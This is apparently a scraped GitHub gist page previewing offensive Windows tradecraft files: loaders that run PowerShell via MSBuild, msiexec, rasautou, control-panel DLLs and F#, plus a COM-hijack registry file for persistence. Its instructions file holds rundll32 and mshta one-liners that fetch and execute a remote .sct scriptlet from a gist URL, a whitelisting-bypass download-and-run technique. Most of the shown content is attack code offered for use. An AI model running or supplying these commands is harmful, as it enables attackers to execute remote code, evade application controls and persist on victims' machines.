View PSA64.cs
//Credit to Casey Smith for his initial research: https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371 | |
//Based on Jared Haight's work (https://github.com/jaredhaight/PSAttack) | |
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs" | |
using System; | |
using System.Reflection; | |
namespace PSA64 | |
{ | |
class Program |
View instructions.txt
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} | |
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC} | |
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC} | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close(); | |
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close(); |
View powersct.sct
<?xml version="1.0" encoding="utf-8"?> | |
<package> | |
<component | |
id="dummy"> | |
<registration | |
description="dummy" | |
progid="dummy" | |
version="1.00" | |
remotable="True"> | |
<script |
View fsharp.fsscript
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
open System.Management.Automation | |
open System.Management.Automation.Runspaces | |
open System | |
let runSpace = RunspaceFactory.CreateRunspace() | |
runSpace.Open() | |
let pipeline = runSpace.CreatePipeline() |
View com_hijack.reg
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |
View file.rsp
REGSVR odbcconf.dll |
View msiexec.cs
// msiexec /z "full path to msiexec.dll" | |
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.Text; |
View PSA_MSBUILD64.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Based on Casey Smith's work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371) --> | |
<!-- Based on Jared Haight's work (https://github.com/jaredhaight/PSAttack) --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe PSA_MSBUILD64.csproj --> | |
<Target Name="PSAttack"> | |
<PSA_MSBUILD64 /> | |
</Target> | |
<UsingTask | |
TaskName="PSA_MSBUILD64" |
View rasautou.cs
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Management.Automation; | |
using System.Collections.ObjectModel; | |
using System.Text; | |
// compile using unmanaged exports and referencing system.management.automation | |
// rasautou -d powershell.dll -p powershell -a a -e e |
View cpl.cs
using System; | |
using System.Runtime.InteropServices; | |
using RGiesecke.DllExport; | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; | |
using System.Management.Automation.Runspaces; | |
using System.Text; | |
public class Test | |
{ |